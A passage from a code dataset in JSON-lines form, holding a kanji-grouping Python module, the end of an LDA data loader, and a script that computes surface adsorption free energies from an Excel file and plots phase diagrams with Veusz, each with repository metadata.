y_test=label_shuffled[:Test_Size]\n return x_train,y_train,x_test,y_test\n\n\n# load_corpus()\n", "repo_name": "QqqingYuan/TagPaper", "sub_path": "lda/load_data.py", "file_name": "load_data.py", "file_ext": "py", "file_size_in_byte": 2574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "codecs.open", "line_number": 15, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 43, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "2809916113", "text": "import math\nfrom typing import Iterable, List, TypedDict\nfrom collections import UserList\n\nfrom .entity import KanjiEntity, Jlpt\n\n\nclass KanjiListGroup(TypedDict):\n size: int\n count: int\n kanji: List[KanjiEntity]\n\n\nclass KanjiList(UserList[KanjiEntity]):\n def __init__(self, initlist: Iterable[KanjiEntity] | None = ...) -> None:\n super().__init__(initlist=initlist)\n self.data.sort(key=lambda ent: -ent.jlpt)\n\n def sort_by_ext_id(self):\n return self.data[:].sort(key=lambda ent: ent.ext_id)\n\n def group_by_jlpt(self) -> List[List[KanjiEntity]]:\n res: List[List[KanjiEntity]] = []\n\n for lvl in reversed(Jlpt):\n kanji_list = [kanji for kanji in self if kanji.jlpt == lvl.value]\n kanji_list.reverse()\n res.append(kanji_list)\n\n return res\n\n def regroup(self, max_width: int) -> List[KanjiListGroup]:\n grouped: List[KanjiListGroup] = []\n kanji_by_jlpt = self.group_by_jlpt()\n\n for i, kanji in enumerate(kanji_by_jlpt):\n length = len(kanji)\n\n try:\n count: int = length + grouped[i - 1][\"count\"]\n except Exception:\n count: int = length\n\n size = math.floor(math.sqrt(count))\n\n grouped.append(\n {\n \"count\": count,\n \"size\": max_width if i == len(kanji_by_jlpt) - 1 else size,\n \"kanji\": kanji,\n }\n )\n\n return grouped\n", "repo_name": "ChillyBwoy/powerkanji", "sub_path": "parser/powerkanji/models/list.py", "file_name": "list.py", "file_ext": "py", "file_size_in_byte": 1514, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypedDict", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 11, "usage_type": "name"}, {"api_name": "collections.UserList", "line_number": 14, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 15, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 23, "usage_type": "name"}, {"api_name": "entity.Jlpt", "line_number": 25, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}, {"api_name": "math.floor", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "33810307316", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport pandas as pd\nimport parser\nimport shutil\n\n# blue_darkred\n# copy from veusz/utils/colormap\ncolor_map = ( # order: b,g,r\n (216, 0, 36, 255),\n (247, 28, 24, 255),\n (255, 87, 40, 255),\n (255, 135, 61, 255),\n (255, 176, 86, 255),\n (255, 211, 117, 255),\n (255, 234, 153, 255),\n (255, 249, 188, 255),\n (255, 255, 234, 255),\n (234, 255, 255, 255),\n (188, 241, 255, 255),\n (153, 214, 255, 255),\n (117, 172, 255, 255),\n (86, 120, 255, 255),\n (61, 61, 255, 255),\n (53, 39, 247, 255),\n (47, 21, 216, 255),\n (33, 0, 165, 255)\n)\n\ndef get_color(n,start=0,stop=1):\n '''\n Return a dict of color in hex with length of n.\n The color list is interpolate of colormap.\n '''\n cmap = np.array(color_map)\n x0 = np.linspace(start,stop,len(color_map))\n x = np.linspace(start,stop,n).astype(np.intc)\n b = np.interp(x,x0,cmap[:,0]).astype(np.intc)\n g = np.interp(x,x0,cmap[:,1]).astype(np.intc)\n r = np.interp(x,x0,cmap[:,2]).astype(np.intc)\n clist = ['#%02x%02x%02x' % tuple(rgb) for rgb in zip(r,g,b)]\n cdict = {}\n for i,c in enumerate(clist):\n cdict[x[i]] = c\n return cdict\n\ndef start_veusz():\n # for ploting by veusz \n print(\"Preparing plotting environment ...\")\n global isveusz\n try:\n import veusz.embed\n isveusz = True\n print(\"The data will be plotted by Veusz!\")\n from xvfbwrapper import Xvfb\n vdisplay = Xvfb()\n vdisplay.start()\n embed = veusz.embed.Embedded(hidden=True)\n return embed,vdisplay\n except:\n isveusz = False\n print(\"Can't import Veusz, the data will not be plotted!\")\n return None,None\n\ndef close_veusz(embed,vdisplay):\n if isveusz:\n embed.Close()\n # vdisplay.stop()\n\ndef data_from_xls(filename): \n print('Reading input excel file ...')\n allsheet = pd.read_excel(filename,sheet_name=None)\n input_data = allsheet['data']\n ref_data = allsheet['ref']\n ref_detail = {}\n for s in allsheet:\n if s.startswith('ref_'):\n name = s[4:]\n ref_detail[name] = allsheet[s]\n print('Initialize data ...')\n data = input_data.dropna(subset=['Nads','E_Total']) # remove rows that are NaN for Nads and E_Total\n data = data.dropna(axis=0,how='all')\n return data,ref_data,ref_detail\n \ndef check_data(data,ref):\n # data is a pandas.DataFrame\n require_col = set((u'Nads', u'E_Slab', u'E_Total','Formula'))\n if not require_col.issubset(set(data.columns)):\n print('Error: Required Columns are ', ', '.join(require_col))\n\n for icol in ('Name','E_Slab','ZPE_Slab','ZPE_Total','Formula'): # fill NaN with i[0], else 0\n v = data[icol][0]\n if pd.isnull(data[icol][0]):\n v = 0\n data[icol] = data[icol].fillna(v)\n \n data = data.groupby(by=['Name','Nads'],as_index=False).agg(min) # 聚合相同的Nads, 取最小值。注意,没有作为新的index。\n\n data['G_Slab'] = data['E_Slab'] + data['ZPE_Slab']\n data['G_Total'] = data['E_Total'] + data['ZPE_Total']\n \n return data\n\ndef check_formula(s):\n co_names = parser.expr(s).compile().co_names\n for i in co_names:\n exec(i+'=1.0') # assign name with value\n try:\n eval(s)\n except Exception as e:\n msg = \" \".join([e,s])\n print(msg)\n exit(0)\n \ndef parse_formula(s):\n '''\n Parse the string formula to a list.\n '''\n check_formula(s)\n result = []\n var = ''\n for i in s:\n if i in '+-*/()':\n if var != '':\n result.append(var)\n result.append(i)\n var = ''\n elif i in ' ': # 去除所有空格\n pass\n else:\n var += i\n if var != '':\n result.append(var)\n return result\n\ndef rebuild_formula(s,mapping):\n '''\n Replace the vars according to map and rebuild the list to new formula string.\n mapping = {'old_var':'new_var'}\n '''\n l = parse_formula(s)\n nl = [mapping.pop(il,il) for il in l] # dict.pop is great!\n ns = ''.join(nl)\n for k in mapping: # for the item not in formula, let them multiply 0\n ns += '+0*' + mapping[k]\n return ns\n \ndef new_formula(ref,formula,name):\n mapping = {}\n for k in ref[name].keys():\n mapping[k] = 'ref[\"'+name+'\"][\"'+k+'\"]'\n if name in ('S','HT'):\n mapping[k] += '(T)'\n return rebuild_formula(formula,mapping)\n\ndef get_ref(ref_data,ref_detail,formula):\n '''\n ref_data is pandas.DataFrame, formula is pandas.Series.\n '''\n variable = {} # if T or p are variables, store them\n ref = {}\n # get T\n t = ref_data['Temperature']\n t = t[pd.notnull(t)]\n if len(t) > 1:\n print(\"Error: Pls Check Temperature Input!\")\n exit(0)\n elif len(t)==0:\n ref['T'] = 0 # default value for ref['T']\n else:\n t = t.iloc[0]\n if type(t) in (np.float64,np.int64,int,float): # t is a number, type is from pandas\n ref['T'] = t\n else: # t is a variable\n try:\n ref['T'] = np.array(eval(t))\n if ref['T'][0] != ref['T'][1]:\n variable['T'] = ref['T']\n else:\n ref['T'] = ref['T'][0]\n except Exception as e:\n print(\"Error: Please check the temperature format!\")\n print(e)\n exit(0)\n \n ref['S'] = {}\n ref['p'] = {}\n ref['HT'] = {}\n ref['E'] = {}\n ref['dZPE'] = {}\n ref['u'] = {}\n for nf in formula:\n co_names = set([name for name in parser.expr(nf).compile().co_names])-set(('Total','Slab','Nads'))\n for iname in co_names:\n # assign HT,E,dZPE,u,S\n row = ref_data[ref_data.Name == iname]\n if row.shape[0] != 1:\n print (\"Error: Duplicated or NO row for \"+iname)\n break\n \n for r in ('E','dZPE',):\n rd = row[r]\n if rd.isnull().iloc[0]:\n print (\"Error: NO E or dZPE for \"+iname)\n break\n else:\n ref[r][iname] = rd.iloc[0]\n \n for r in ('S','HT',):\n rd = row[r]\n if rd.notnull().iloc[0]:\n def func(x,c=rd.iloc[0]):\n return np.ones(len(x))*c if hasattr(x,'__iter__') else c\n else:\n if iname in ref_detail: # use S(T) and H(T)\n v = ref_detail[iname]\n if r in v.columns:\n if np.all(pd.notnull(v[r])):\n def func(x,vt=v['T'],vr=v[r]):\n return np.interp(x,vt,vr)\n else:\n print(\"Error: pls check ref_\"+iname)\n break\n else:\n def func(x):\n return np.zeros(len(x)) if hasattr(x,'__iter__') else 0.0\n else:\n print (\"Error: No \"+r+\" vaule for \"+iname)\n break\n ref[r][iname] = func\n # assign pressure\n p = row['Press']\n\n if p.isnull().iloc[0]:\n ref['p'][iname] = None # unit ln(bar)\n else:\n if type(p.iloc[0]) in (np.float64,np.int64,int,float):\n ref['p'][iname] = np.log(p.iloc[0])\n else:\n try:\n ref['p'][iname] = np.array(np.log(eval(p.iloc[0]))) # ln(p)\n if ref['p'][iname][0] != ref['p'][iname][1]:\n if 'p' not in variable:\n variable['p'] = {} \n variable['p'][iname] = ref['p'][iname]\n else:\n ref['p'][iname] = ref['p'][iname][0]\n except Exception as e:\n print(\"Error: Please check the Press format!\")\n print(e)\n break\n # get u\n u = row['u']\n if u.isnull().iloc[0]:\n ref['u'][iname] = None # default 0\n else:\n if type(u.iloc[0]) in (np.float64,int,float):\n ref['u'][iname] = u.iloc[0]\n else:\n try:\n ref['u'][iname] = np.array(eval(u.iloc[0])) # ln(p)\n if ref['u'][iname][0] != ref['u'][iname][1]:\n if 'u' not in variable:\n variable['u'] = {} \n variable['u'][iname] = ref['u'][iname]\n else:\n ref['u'][iname] = ref['u'][iname][0]\n except Exception as e:\n print(\"Error: Please check the u format!\",e)\n print(u)\n break\n return ref,variable\n\ndef plot_1D(plot_dict):\n \"\"\"\n plot_dict keys:\n embed: veusz.embed.Embedded or None\n xlabel: str\n xdata: numpy.array\n ydata: dict, {Nads:value}\n output: str\n \"\"\"\n xdata = plot_dict['xdata']\n xlabel = plot_dict['xlabel']\n veusz_set = []\n veusz_set.append(\"SetData('x',\"+str(xdata.tolist())+\")\")\n ydata = plot_dict['ydata']\n ymin = []\n ymax = []\n for nads in ydata:\n dG = ydata[nads].tolist()\n name = 'G' + nads\n path = '/data/graph1/' + name\n veusz_set.append(\"CloneWidget('/data/graph1/template','/data/graph1','\"+name+\"')\")\n veusz_set.append(\"Set('\"+path+\"/key', '\"+nads+\"')\")\n veusz_set.append(\"Set('\"+path+\"/xData','x')\")\n veusz_set.append(\"SetData('\" + name + \"', \" +str(dG)+\")\")\n veusz_set.append(\"Set('\"+path+\"/yData','\"+name+\"')\")\n ymin.append(min(dG))\n ymax.append(max(dG))\n veusz_set.append(\"Set('/data/graph1/x/min',\"+str(float(min(xdata)))+\")\")\n veusz_set.append(\"Set('/data/graph1/x/max',\"+str(float(max(xdata)))+\")\")\n veusz_set.append(\"Set('/data/graph1/x/label','\"+xlabel+\"')\")\n ymin = min(ymin)\n ymax = max(ymax)\n veusz_set.append(\"Set('/data/graph1/y/min',\"+str(float(ymin-(ymax-ymin)*0.2))+\")\")\n veusz_set.append(\"Set('/data/graph1/y/max',\"+str(float(ymax+(ymax-ymin)*0.2))+\")\")\n veusz_set.append(\"Remove('/data/graph1/template')\")\n veusz_set.append(\"Remove('/contour')\")\n # save to vsz\n output_filename = plot_dict['output']\n shutil.copy2('template.vsz',output_filename+'.vsz')\n veusz_file = open(output_filename+'.vsz','a')\n for i in veusz_set:\n veusz_file.write(i+'\\n')\n veusz_file.close()\n # save data to .dat file\n print('Save data to '+output_filename+'.csv')\n ydata[xlabel] = xdata \n data_df = pd.DataFrame(ydata)\n data_df.set_index(xlabel,inplace=True)\n data_df.to_csv(output_filename+'.csv',index=True,float_format='%5.3f')\n embed = plot_dict['embed']\n if embed is not None:\n embed.Load(output_filename+'.vsz')\n print('Export to '+output_filename+'.jpg')\n embed.Export(output_filename+'.jpg',dpi=300)\n\ndef plot_2D(plot_dict):\n # 生成等值面图\n ngrid = plot_dict['ngrid']\n xdata = plot_dict['xdata']\n ydata = plot_dict['ydata']\n xgrid = plot_dict['xgrid']\n ygrid = plot_dict['ygrid']\n nmin = plot_dict['nmin']\n nmax = plot_dict['nmax']\n xlabel = plot_dict['xlabel']\n ylabel = plot_dict['ylabel']\n label = plot_dict['label']\n output_filename = plot_dict['output']\n embed = plot_dict['embed']\n print('Generate 2D contour '+output_filename)\n veusz_set = []\n veusz_set.append(\"SetData2D('grid',\"\n +str(ngrid.tolist())\n +\",xcent=\"\n +str(xdata.tolist())\n +\",ycent=\"\n +str(ydata.tolist())\n +\")\")\n veusz_set.append(\"Set('/contour/graph1/image1/min',\"+str(nmin)+\")\")\n veusz_set.append(\"Set('/contour/graph1/image1/max',\"+str(nmax)+\")\")\n ncolormap = str(nmax-nmin)\n veusz_set.append(\"Set('/contour/graph1/image1/colorMap', u'blue-darkred-step\"+ncolormap+\"')\")\n veusz_set.append(\"Set('/contour/graph1/colorbar1/MajorTicks/number', \"+ncolormap+\")\")\n level = np.unique(ngrid).tolist()\n veusz_set.append(\"Set('/contour/graph1/contour1/manualLevels', \"+str(level)+\")\")\n xmin = min(xdata)\n xmax = max(xdata)\n veusz_set.append(\"Set('/contour/graph1/x/label','\"+ xlabel+\"')\")\n veusz_set.append(\"Set('/contour/graph1/x/min',\"+str(float(xmin))+\")\")\n veusz_set.append(\"Set('/contour/graph1/x/max',\"+str(float(xmax))+\")\")\n ymin = min(ydata)\n ymax = max(ydata)\n veusz_set.append(\"Set('/contour/graph1/y/label','\"+ ylabel+\"')\")\n veusz_set.append(\"Set('/contour/graph1/y/min',\"+str(float(ymin))+\")\")\n veusz_set.append(\"Set('/contour/graph1/y/max',\"+str(float(ymax))+\")\")\n # add label and rect\n cmap = get_color(ncolormap,nmin,nmax-1)\n label_file=open(output_filename+'_labelname.dat','w')\n print(\"Label name:\")\n for ilabel in label:\n if ilabel != 0:\n label_name = 'label'+str(ilabel+1)\n rect_name = 'rect' + str(ilabel+1)\n veusz_set.append(\"CloneWidget('/contour/graph1/label1','/contour/graph1','\"+label_name+\"')\")\n veusz_set.append(\"CloneWidget('/contour/graph1/rect1','/contour/graph1','\"+rect_name+\"')\")\n else:\n label_name = 'label1'\n rect_name = 'rect1'\n # set label prop\n veusz_set.append(\"Set('/contour/graph1/\"+label_name+\"/label','\"+str(ilabel)+\"')\")\n yPos = 0.96-ilabel*0.07\n veusz_set.append(\"Set('/contour/graph1/\"+label_name+\"/yPos',[\"+str(yPos)+\"])\")\n # set rect prop\n yPos = 0.97-ilabel*0.07\n veusz_set.append(\"Set('/contour/graph1/\"+rect_name+\"/yPos',[\"+str(yPos)+\"])\")\n veusz_set.append(\"Set('/contour/graph1/\"+rect_name+\"/Fill/color','\"+cmap[ilabel]+\"')\")\n print(str(ilabel)+': '+label[ilabel])\n label_file.write(\"%4i\\t%s\\n\" %(ilabel,label[ilabel]))\n label_file.close()\n print(\"Label names were saved in \"+output_filename+'_labelname.dat')\n veusz_set.append(\"Remove('/data')\")\n shutil.copy2('template.vsz',output_filename+'.vsz')\n veusz_file = open(output_filename+'.vsz','a')\n for i in veusz_set:\n veusz_file.write(i+'\\n')\n veusz_file.close()\n\n # save data to .dat file\n quality_2d = xgrid.shape\n dim = quality_2d[0]*quality_2d[1]\n xyz = np.asarray([xgrid.reshape(dim),ygrid.reshape(dim),ngrid.reshape(dim)]).T\n np.savetxt(output_filename+'.dat',xyz,fmt='%.5f',header=\" \".join((xlabel,ylabel,\"N\")))\n if embed is not None:\n embed.Load(output_filename+'.vsz')\n print('Export to '+output_filename+'.jpg')\n embed.Export(output_filename+'.jpg',dpi=300)\n\ndef get_ref_u(raw_ref):\n ref = raw_ref.copy()\n # get u for all ref\n for name in ref['u']:\n T = ref['T']\n try:\n # get u directly\n print(\"Try to use u for \"+name+\" directly...\")\n ref['u'][name] = ref['u'][name]+ref['E'][name]+ref['dZPE'][name]+ref['HT'][name](T)\n print(\"Done!\")\n except Exception as e1:\n print(\"This is why can't use u directly: \"+str(e1)) # \n # get u from T and p\n print(\"Try to get u from T and p ...\")\n try:\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n print(\"Done!\")\n except Exception as e2:\n print(e2)\n print(\"Error: Pls provide enough ref data: p, T or u!\")\n print(ref)\n exit(0)\n return ref\ndef phase_diagram(input_xls,quality_2d=(500,500),lprobability=False,p_threshold=0.05):\n\n input_data,ref_data,ref_detail = data_from_xls(input_xls)\n formula = input_data['Formula'] # formula is pd.Series\n ref,variable = get_ref(ref_data,ref_detail,formula)\n data = check_data(input_data,ref)\n nvar = len(variable)\n if nvar == 1:\n k = list(variable)[0]\n if k in ('p','u'):\n nvar = len(variable[k])\n print(\"Number of variable is \"+str(nvar))\n if nvar > 0:\n print(variable)\n embed,vdisplay = start_veusz()\n ref = get_ref_u(ref)\n if nvar == 1:\n vk,vv = list(variable.items())[0] \n if vk == 'T':\n T = np.linspace(vv[0],vv[1],quality_2d[0])\n xdata = T\n output = 'G_'+vk\n xlabel = 'Temperature (K)'\n # recalculate u for new T\n for name in ref['u']:\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n elif vk == 'p':\n xlabel = 'ln(p('+ list(vv.keys())[0] + ')/p0)'\n xdata = list(vv.values())[0]\n output = 'G_'+vk+'_'+list(vv.keys())[0]\n # no required for recalculate u\n elif vk == 'u':\n xlabel = 'u('+ list(vv.keys())[0] + ') (eV)'\n xdata = list(vv.values())[0]\n output = 'G_'+vk+'_'+list(vv.keys())[0]\n # no required for recalculate u\n else:\n print('Unsupport variable!')\n exit(0)\n\n elif nvar == 2: \n \"\"\"\n Three cases: (T,p), (p1,p2), (u1,u2), (T, u)\n \"\"\" \n keys = variable.keys()\n if ('T' in keys) and ('p' in keys):\n xlabel = 'T(K)'\n pk = list(variable['p'].keys())[0]\n pv = list(variable['p'].values())[0]\n ylabel = 'ln(p('+ pk+ ')/p0)'\n output = \"_\".join(['T','p',pk,'2D'])\n xdata = np.linspace(variable['T'][0],variable['T'][1],quality_2d[0])\n ydata = np.linspace(pv[0],pv[1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['p'][pk] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n T = xgrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new T\n for name in ref['u']:\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n\n elif ('T' in keys) and ('u' in keys):\n xlabel = 'T(K)'\n pk = list(variable['u'].keys())[0]\n pv = list(variable['u'].values())[0]\n ylabel = 'u('+ pk+ ') (eV))'\n output = \"_\".join(['T','u',pk,'2D'])\n xdata = np.linspace(variable['T'][0],variable['T'][1],quality_2d[0])\n ydata = np.linspace(pv[0],pv[1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['u'][pk] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n T = xgrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new T\n for name in ref['u']:\n if name != pk: # don't calculate u for pk\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n \n elif ('p' in keys) and len(keys)==1:\n pk = list(variable['p'].keys())\n pv = list(variable['p'].values())\n xlabel = 'ln(p('+ pk[0] + ')/p0)'\n ylabel = 'ln(p('+ pk[1] + ')/p0)'\n output = \"_\".join(['p',pk[0],'p',pk[1],'2D'])\n xdata = np.linspace(pv[0][0],pv[0][1],quality_2d[0])\n ydata = np.linspace(pv[1][0],pv[1][1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['p'][pk[0]] = xgrid.reshape(quality_2d[0]*quality_2d[1])\n ref['p'][pk[1]] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new p\n T = ref['T']\n for name in pk: # not for all u\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n elif ('u' in keys) and len(keys)==1:\n uk = list(variable['u'].keys())\n uv = list(variable['u'].values())\n xlabel = 'u('+ uk[0] + ') (eV)'\n ylabel = 'u('+ uk[1] + ') (eV)'\n output = \"_\".join(['u',uk[0],'u',uk[1],'2D'])\n xdata = np.linspace(uv[0][0],uv[0][1],quality_2d[0])\n ydata = np.linspace(uv[1][0],uv[1][1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['u'][uk[0]] = xgrid.reshape(quality_2d[0]*quality_2d[1])\n ref['u'][uk[1]] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new u\n T = ref['T']\n for name in uk: # not for all u\n ref['u'][name] += ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T) \n else:\n print(\"Unsupport 2D plot for: \"+str(keys))\n exit(0)\n # Get 2D data\n zgrid = []\n zgrid.append(np.zeros(xgrid.shape)) # all grid should compare to 0!\n elif nvar > 2:\n print(\"Number of variables must less than 2!\")\n exit(0)\n\n # eval dG\n dG = []\n for irow in range(len(data)):\n idata = data.iloc[irow]\n Nads = idata['Nads']\n iformula = idata['Formula']\n Total = idata['G_Total'] # for eval formula\n Slab = idata['G_Slab'] # for eval formula\n dG.append(eval(new_formula(ref,iformula,'u')))\n\n # output\n if nvar == 0:\n # 这意味着p和T (or u) 是一个值, 不做图\n data['dG'] = dG\n data['dG_avg'] = data['dG']/data['Nads'] # 平均吸附能\n print('Save data to excel file G_result.xslx')\n data = data[['Name','Nads','Formula','E_Slab','ZPE_Slab','E_Total','ZPE_Total','dG','dG_avg',]]\n data.to_excel('G_result.xlsx',float_format='%.4f',index=False)\n elif nvar == 1:\n ydata = {}\n for irow in range(len(data)):\n idata = data.iloc[irow]\n Nads = idata['Nads']\n name = idata['Name']\n ydata[name+'(N='+str(Nads)+')'] = dG[irow]\n plot_dict = {\n 'xdata':xdata,\n 'ydata': ydata,\n 'xlabel':xlabel,\n 'embed': embed,\n 'output':output,\n }\n plot_1D(plot_dict)\n elif nvar == 2:\n # get Gmin\n dG = np.array([[0]*(quality_2d[0]*quality_2d[1])]+dG)\n Gmin = dG.min(0) # column min\n ddG = dG - Gmin\n # calculate partition function\n if type(T) not in (np.ndarray,):\n if T==0:\n T = 298.15\n print(\"Use T=298.15 instead of 0!\")\n if not lprobability:\n T = 0.00000000001 # use very small T\n q = np.exp(-ddG*1000*96.4853/8.314/T) # note: T can be a array or number\n # calculate probability\n P = q/q.sum(0)\n # get logical array\n LP = P >= p_threshold # the probability bigger than threshold can exists\n LPset = list(set(map(tuple,LP.T))) # note: column mode\n # get index array\n Narray = np.ones(quality_2d[0]*quality_2d[1])*-1 # default value is -1\n for idx,iLP in enumerate(LPset):\n Narray[np.all(LP.T==iLP,1)] = idx\n # make it grid like \n ngrid = Narray.reshape(quality_2d)\n # get the labels\n label = {}\n label_id = np.unique(Narray).astype(np.intc)\n namelist = np.array([0]+list(data['Name']))\n nadslist = np.array([0]+list(data['Nads']))\n for idx in label_id:\n if idx != -1:\n iLP = LPset[idx]\n name = namelist[np.array(iLP)]\n nads = nadslist[np.array(iLP)]\n label_name = []\n if hasattr(name ,'__iter__'):\n for iname,inads in zip(name,nads):\n label_name.append(iname+'(N='+str(inads)+')')\n label_name = str(tuple(label_name))\n else:\n label_name = iname+'(N='+str(inads)+')'\n label[idx] = label_name \n else:\n label[idx] = None\n nmax,nmin = len(LPset),-1\n plot_dict = {\n 'ngrid':ngrid,\n 'xdata':xdata,\n 'ydata':ydata,\n 'xgrid':xgrid,\n 'ygrid':ygrid,\n 'nmin':nmin,\n 'nmax':nmax,\n 'xlabel':xlabel,\n 'ylabel':ylabel,\n 'output':output,\n 'embed':embed,\n 'label':label,\n }\n plot_2D(plot_dict)\n\n# close_veusz(embed,vdisplay)\n\nif __name__ == '__main__':\n # Constant\n quality_2d = (500,500) # the quality for 2D contour map\n import sys\n args = sys.argv\n lprobability = False\n p_threshold = 0.05\n filename = None\n if (len(args) < 2):\n print(\"usage: auto_phase_diagram.py xls_file [--probability threshold]\")\n exit(0)\n else:\n for idx,arg in enumerate(args):\n if arg == '--probability':\n try:\n p_threshold = float(args[idx+1])\n if p_threshold <= 0.0:\n print(\"Use default threshold 0.05.\")\n p_threshold = 0.05\n except:\n print(\"Use default threshold 0.05.\")\n pass\n lprobability = True\n elif '.xls' in arg:\n filename = arg\n \n if not filename:\n print(\"usage: auto_phase_diagram.py xls_file [--probability threshold]\")\n print(\".xls file should be provided!\")\n exit(0)\n phase_diagram(filename,quality_2d=quality_2d,lprobability=lprobability,p_threshold=p_threshold)", "repo_name": "renpj/auto_phase_diagram", "sub_path": "auto_phase_diagram.py", "file_name": "auto_phase_diagram.py", "file_ext": "py", "file_size_in_byte": 26520, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 41, "usage_type": "attribute"}, {"api_name": "xvfbwrapper.Xvfb", "line_number": 57, "usage_type": "call"}, {"api_name": "veusz.embed.embed.Embedded", "line_number": 59, "usage_type": "call"}, {"api_name": "veusz.embed.embed", "line_number": 59, "usage_type": "attribute"}, {"api_name": "veusz.embed", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.read_excel", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 94, "usage_type": "call"}, {"api_name": "parser.expr", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.int64", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 177, "usage_type": "call"}, {"api_name": "parser.expr", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 219, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.int64", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 258, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 358, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 406, "usage_type": "call"}, {"api_name": 